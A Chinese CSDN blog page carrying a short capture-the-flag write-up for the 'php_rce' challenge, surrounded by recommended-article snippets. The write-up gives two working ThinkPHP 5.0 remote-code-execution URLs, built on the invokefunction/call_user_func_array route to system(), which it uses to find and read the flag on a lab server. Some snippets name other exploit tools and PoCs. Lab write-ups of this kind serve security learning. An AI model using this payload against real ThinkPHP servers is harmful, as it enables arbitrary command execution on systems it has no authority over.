攻防世界web高手区php_rce

最新推荐文章于 2024-08-12 10:31:29 发布
最新推荐文章于 2024-08-12 10:31:29 发布
阅读量1.5k 收藏
点赞数
文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44709006/article/details/120612854
版权
"这篇文章揭示了如何在ThinkPHP5.0框架下发现并利用RCE漏洞,通过系统调用展示如何寻找和读取flag。作者byhsc-浓眉分享了入侵步骤和找到的flag:flag{thinkphp5_rce}
摘要由CSDN通过智能技术生成

php_rce

在这里插入图片描述
访问题目链接,发现网站使用框架为 ThinkPHP 5.0,结合题目提示,应该存在 ThinkPHP RCE漏 洞

  1. 查找 flag:
    http://220.249.52.133:46433/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述
2.cat flag
http://220.249.52.133:46433/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述

flag{thinkphp5_rce}

by hsc-浓眉

7号极客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TDOA_RCE:通达OA综合利用工具
03-03
任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含...
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
攻防世界-php_rce详解
热门推荐
Mr_helloword的博客
08-10 1万+
php_rce 进入后发现是一个php框架,根据题目php-rce远程命令执行,我们百度一下这个版本有什么漏洞
攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 259
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶001
weixin_39599654的博客
03-09 751
XCTF攻防世界_Web进阶001XCTF攻防世界_Web进阶001XCTF_Web_高手进阶baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界web高手进阶php_rce,攻防世界_web高手进阶_Training-WWW-Robots、php_rce
weixin_39530647的博客
03-09 73
Training-WWW-Robotsrobots协议是Python爬虫时涉及到的一个协议,在URL后直接加上/robots.txt,显示如下图: 然后如图所示把/robots.txt改成/f10g.php后得到flag:cyberpeace{dc7c764839800a9e351c917915b1e03e}php_rce 根据题目的writeup: 百度后可知5.1版本的thinkPHP漏洞为 ...
攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)
weixin_39637924的博客
03-09 377
题目今天做CTF的时候,遇到下面这道题,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。 解题过程去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈: 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:输入:http://your-ip:8080/index.php?s=/Inde...
攻防世界web高手进阶php_rce,攻防世界 web高手进阶 1-5 2020.6.11
weixin_35962351的博客
03-09 276
前言继续ctf的旅程攻防世界web高手进阶的1-5题1、baby_web进去是个1.php页面里只有helloworld按题意是说想看初始网页猜测有index.php结果直接跳转到1.php查看源码在index的请求头里发现flag2、Training-WWW-Robots这题不就是个robots嘛没什么好说的了进入robots.txt发现php进入php发现flag3、Web_python_t...
攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶Writeup(更行ing)
weixin_42531396的博客
03-09 156
baby_webEMMMM,这就是一个签到题~解题方法:F12→Networks→刷新抓包→完成Training-WWW-Robots看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识打开网页,果然~他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the con...
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 970
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2617
web篇(php_rce)详解
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 492
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
LNMP环境搭建论坛
qq_63652578的博客
08-07 1003
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 299
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
PHP图书借阅微信小程序系统源码
最新发布
2401_84414018的博客
08-12 137
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值